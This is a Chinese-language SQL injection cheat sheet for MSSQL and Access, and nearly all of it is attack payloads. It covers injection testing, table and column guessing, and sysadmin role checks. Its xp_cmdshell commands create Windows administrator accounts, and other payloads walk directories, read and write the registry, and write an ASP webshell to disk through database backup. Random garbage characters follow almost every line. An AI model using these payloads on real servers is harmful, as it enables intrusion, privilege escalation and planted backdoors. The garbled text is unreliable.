1.判断是否有注入;and 1=1 ;and 1=2 !��[���X.%
2.初步判断是否是mssql ;and user>0 L[QI ��5N�
)��z*$`?)k
3.注入参数是字符'and [查询条件] and ''=' 7�Y �@=x#
)l[7;�ZIw$
4.搜索时没过滤参数的'and [查询条件] and '%25'=' )��@lo ';\
$�S)e"Po~5
5.判断数据库系统 qhn���&;{{
kw-��Kx4 )
;and (select count(*) from sysobjects)>0 mssql ]~�g|SqPA@
�F|n$0v�Q*
;and (select count(*) from msysobjects)>0 access 9b�zYADLI�
�$U��"��P+
D\�_*��,Fc
�#LN��B@E
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �L2/�<+�Zw
<�7�6=H]h~
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 1,;qXMhK`;
H�/v37%p�7
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 #`6�O�C)1J
HS5Ug'\446
9.(1)猜字段的ascii值(access) ;hf�G$�{l;
���)��*$�
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ~A:;�?A'�.
8HH.P`�Vk#
(2)猜字段的ascii值(mssql) �]B�[/s�qf
)8�N)Z~h�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ^B"�_�b?b
v_1JH�<GJ-
10.测试权限结构(mssql) b#�\�k�Z/W
D���!D%�.�
�i�$LV�4�4
�[(e��`��b
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- J�k�6/i;4|
m?R�+Z6c[�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ��U}vtVvx�
�u)�:��Rw�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- \�Dsl7�s=�
i]�^*J1�a�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- :�R|2z`b!�
r<f-v_b�xF
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- I�+4qu|0lA
*i]����Z=�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- ��n4�d(`��
X�G�rxzO|{
;and 1=(select IS_MEMBER('db_owner'));-- Z]>�e�& �N
�\8>��N<B)
)�>A%F�L9
�hwol7B> �
11.添加mssql和系统的帐户 �!�PP?�2Ax
:#�!F 7u
;exec master.dbo.sp_addlogin username;-- $gD�(MKR)~
;exec master.dbo.sp_password null,username,password;-- t;�a}p�_�>
s7)#� �NT2
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- EpoQV�^�Ey
$�lG�--��s
;exec master.dbo.xp_cmdshell 'net user username password Ad�N=��y8T
@ :���� �
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 7_�'k`�J@_
D��k�MC!Q\
;exec master.dbo.xp_cmdshell 'net user username password /add';-- HIp �{< M3
Rx"Vs�cB6z
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- CYic�_rF$�
\?mU$,v�oI
Mvj�wP?J]�
r'JK���$9�
12.(1)遍历目录 m5Laq'~0�_
T.�Y4��L�
;create table dirs(paths varchar(100), id int) �TX5/�{cHd
�zm^p7&ak$
;insert dirs exec master.dbo.xp_dirtree 'c:\' c�.me1fGn�
6`$z�*C2�{
;and (select top 1 paths from dirs)>0 �U>M>�F�Z�
�-3X��n�K5
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) Z_ *�ZUN?B
w7�A��BnX�
��K/�La�A4
Fb�4S�/_
V
(2)遍历目录 �-�){^
Q:u
1ZH8/1g�WI
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- k}a�!lI:�
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ?B31��t9�
+�z/73�s0~
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 r��N!9&���
H��Bk�Q`�T
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 GISI�8W^��
WAXrA$:�3J
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �2�1J8��2M
!m.')�\4<�
2�!& ;ZcT,
�%;X�uA�*e
13.mssql中的存储过程 $,�@�+�Ua
�n�#AH@`&i
xp_regenumvalues 注册表根键, 子键 ���Vh�-h{�
�r�O�>wX_
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �|`9z�E]��
a�{YVz\?d}
xp_regread 根键,子键,键值名 I)4|?tb�?�
z&�G3�&�?Z
;exec xp_regread �bX1!� fa�
#[�r�Fe�p
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 ZFw��7�43G
@�[�N�~�;>
xp_regwrite 根键,子键, 值名, 值类型, 值 �-�Y��,Ibq
4'eVFu+6�2
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 � [
^� \�)
nQ*o�Oxe|X
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 CM���f~Yv�
:r+
1>F$o
xp_regdeletevalue 根键,子键,值名 ��^\t">NJ^
�.3SjkC4I�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ]V7h�l�#VO
wx7>0[��zE
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 KD<`-�b)7<
J�Z0+VB-3U
^rb7��`s#G
R_&�V.\e_
14.mssql的backup创建webshell
d~�s�-�;T
�\e�vgDZf�
use model u�P�D_s�[
\nt��'I;�f
create table cmd(str image); -P�uVI5L<�
Ho�{�?m�^
insert into cmd(str) values (''); fH{$�LjH(
��xo3)ds�X
backup database model to disk='c:\l.asp'; VH*(>^Of�F
~�$�9�"|�
H� zK�=UcD
,=yIfbFQ��
15.mssql内置函数 �_'v� )F�y
�ol>=tk 8}
;and (select @@version)>0 获得Windows的版本号 {-�Oc8XI/�
�u"3cSu�qy
;and user_name()='dbo' 判断当前系统的连接用户是不是sa eh=�b�Cl�k
nr%^:�u��
;and (select user_name())>0 爆当前系统的连接用户 q�"vT]=Y}:
h v+i{Z9!]
;and (select db_name())>0 得到当前连接的数据库 blS4AQ?�b^
A}�}�t86�T
[_GR'x�'0x
gU��$3Y#R�
16.简洁的webshell Z.�19v>�-c
�����SaScP
use model rV�{e[f�Gd
V3�nv�5�/6
create table cmd(str image); 7�[,f;zG��
#_5+kBA+>'
insert into cmd(str) values (''); !kY�mrj**�
�^E8Hv���
backup database model to disk='g:\wwwtest\l.asp';
